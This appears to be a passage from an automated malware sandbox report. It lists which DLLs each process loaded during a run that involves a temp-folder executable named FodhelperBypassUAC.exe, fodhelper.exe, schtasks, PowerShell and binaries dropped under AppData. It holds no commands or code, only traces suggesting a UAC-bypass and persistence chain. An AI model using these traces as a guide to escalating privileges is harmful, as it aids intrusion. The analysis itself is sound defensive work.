        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: mrmcorer.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositorycore.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.ui.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: windowmanagementapi.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: inputhost.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\fodhelper.exeSection loaded: bcp47mrm.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\services64.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
        Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
        Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
        Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
        Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
        Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
        Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: wldp.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
        Source: C:\Windows\explorer.exeSection loaded: pdh.dll
        Source: C:\Windows\explorer.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
